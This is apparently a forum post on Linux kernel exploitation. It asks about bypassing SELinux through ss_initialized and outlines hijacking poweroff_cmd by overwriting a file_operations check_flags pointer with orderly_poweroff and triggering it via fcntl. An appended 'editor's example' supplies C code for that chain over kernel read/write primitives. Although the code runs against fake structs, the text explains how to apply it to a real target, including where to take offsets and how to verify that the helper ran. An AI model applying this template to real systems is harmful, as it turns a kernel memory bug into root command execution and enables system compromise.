@chompie1337 Reading a uint from ss_initialized gave 136077328, and writing to this address gives an error (kallsyms says this is read-only). Reading a ulong from ss_initialized gives something that looks like an address pointer, which points to a 1 (uint), but this address is not writable either.
I looked at the source, and ss_initialized (it works like it should, BTW: it goes to allow if it is 0) is defined with:
Code:
int *ss_initialized __ro_after_init;
So I guess it wouldn't work unless we can somehow safely disable CPU page write protection or trick the kernel into mapping this as writable.
Also, as to poweroff_cmd, if I understood it right, the steps go like this:
1) Overwrite poweroff_cmd string with our file address.
2) Create a file and get the address of the file struct with fdget.
3) Get the file_operations struct address by reading from the file struct address plus the correct offset.
4) Get the offset of the check_flags pointer and overwrite it with the orderly_poweroff pointer.
5) Call fcntl with F_SETFL.
Does this look right? (I'm not sure how to get the offsets; I'm thinking about counting them manually, but I'm not sure because there is some union{} before file_operations, so please tell me if they could be looked up dynamically.) Also, is there any way to verify whether it worked or not?
Thank you very much for helping!
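Editor's added example (not code from the post or from its author): the five-step check_flags chain above, written as functions over abstract kernel read/write primitives, plus the read-back check the post asks about. So that it runs stand-alone, the primitives here copy in-process memory and the "kernel" is a constructed set of fake structs whose layouts are hypothetical; on a real target the primitives would be the exploit's own arbitrary read/write, and the two offsets (`f_op` inside `struct file`, `check_flags` inside `struct file_operations`) would be taken from that kernel's build rather than counted by hand, e.g. `pahole -C file vmlinux` and `pahole -C file_operations vmlinux` against the matching vmlinux, or `bpftool btf dump file /sys/kernel/btf/vmlinux format c` on kernels that ship BTF. Two caveats a practitioner would want: step 5 works because `setfl()` in fs/fcntl.c calls `filp->f_op->check_flags(arg)` when that pointer is non-NULL, and on mainline the filesystem's `file_operations` (e.g. `ext4_file_operations`) is a `const` object in .rodata, so it sits behind the same write protection that stopped the ss_initialized write; the read-back in `verify_hijack` is what tells you whether the pointer was actually replaced before you pull the trigger. Addresses are modelled as `uintptr_t`, i.e. a 64-bit kernel is assumed.

```c
/* Added example: the poweroff_cmd / check_flags chain over abstract kernel
 * read/write primitives, run here against constructed fake kernel memory. */
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define POWEROFF_CMD_PATH_LEN 256   /* same name as the constant in kernel/reboot.c */

/* Hypothetical cut-down layouts standing in for the kernel's struct
 * file_operations and struct file; only the members the chain touches. */
struct fake_file_operations {
    void *owner, *llseek, *read, *write;
    int (*check_flags)(int);
};
struct fake_file {
    uint64_t f_u[2];                           /* stands in for the leading union */
    uint64_t f_path[2];
    void *f_inode;
    const struct fake_file_operations *f_op;
};

/* Constructed fake kernel memory (not a real kernel image). */
static char fake_poweroff_cmd[POWEROFF_CMD_PATH_LEN] = "/sbin/poweroff";
static struct fake_file_operations fake_fops;            /* check_flags starts NULL */
static struct fake_file fake_file = { .f_op = &fake_fops };
static char last_cmd_run[POWEROFF_CMD_PATH_LEN];        /* what the fake helper ran */

/* Stand-in for orderly_poweroff(bool force): records the command it would
 * hand to the usermode helper instead of powering anything off. The real
 * check_flags prototype is int (*)(int); a nonzero flags value lands in
 * orderly_poweroff's bool as force = true. */
static int fake_orderly_poweroff(int force)
{
    (void)force;
    strncpy(last_cmd_run, fake_poweroff_cmd, sizeof last_cmd_run - 1);
    last_cmd_run[sizeof last_cmd_run - 1] = '\0';
    return 0;
}

/* Hypothetical primitives: on a real target these wrap the exploit's
 * arbitrary kernel read/write. Here they copy in-process memory. */
static uintptr_t kread_ptr(uintptr_t a) { uintptr_t v; memcpy(&v, (void *)a, sizeof v); return v; }
static void kwrite_ptr(uintptr_t a, uintptr_t v) { memcpy((void *)a, &v, sizeof v); }
static void kwrite_bytes(uintptr_t a, const void *s, size_t n) { memcpy((void *)a, s, n); }

/* Offsets the chain needs. For a real kernel take them from pahole/BTF for
 * that exact build; these describe the fake structs above. */
static const size_t OFF_F_OP = offsetof(struct fake_file, f_op);
static const size_t OFF_CHECK_FLAGS = offsetof(struct fake_file_operations, check_flags);

/* Steps 1, 3 and 4 of the post. Returns 0, or -1 if our path does not fit
 * in poweroff_cmd (the buffer is fixed-size, so overlong paths must be
 * refused rather than truncated or overflowed). */
int stage_hijack(uintptr_t poweroff_cmd, const char *our_cmd,
                 uintptr_t file, uintptr_t orderly_poweroff_fn)
{
    size_t n = strlen(our_cmd) + 1;
    if (n > POWEROFF_CMD_PATH_LEN)
        return -1;
    kwrite_bytes(poweroff_cmd, our_cmd, n);                 /* step 1 */
    uintptr_t fops = kread_ptr(file + OFF_F_OP);            /* step 3 */
    kwrite_ptr(fops + OFF_CHECK_FLAGS, orderly_poweroff_fn); /* step 4 */
    return 0;
}

/* The verification the post asks about: chase file -> f_op -> check_flags
 * again with the read primitive and compare against the target address. */
bool verify_hijack(uintptr_t file, uintptr_t orderly_poweroff_fn)
{
    uintptr_t fops = kread_ptr(file + OFF_F_OP);
    return kread_ptr(fops + OFF_CHECK_FLAGS) == orderly_poweroff_fn;
}

/* Step 5. Mirrors what fcntl(fd, F_SETFL, flags) does in setfl():
 *   if (filp->f_op->check_flags) error = filp->f_op->check_flags(arg);
 * On a real target this is simply fcntl(fd, F_SETFL, flags) from userland. */
int trigger_setfl(struct fake_file *f, int flags)
{
    if (f->f_op->check_flags)
        return f->f_op->check_flags(flags);
    return 0;
}

const char *last_command_run(void) { return last_cmd_run; }

int main(void)
{
    uintptr_t fn = (uintptr_t)fake_orderly_poweroff;
    if (stage_hijack((uintptr_t)fake_poweroff_cmd, "/tmp/our_cmd",
                     (uintptr_t)&fake_file, fn) != 0)
        return 1;
    if (!verify_hijack((uintptr_t)&fake_file, fn))
        return 1;
    trigger_setfl(&fake_file, 1);
    printf("usermode helper would run: %s\n", last_command_run());
    return 0;
}
```

On a real target the final confirmation is outside the kernel: orderly_poweroff schedules the helper asynchronously, so have the command pointed to by poweroff_cmd leave a marker (create a file, write to a log) and check for it after the fcntl call.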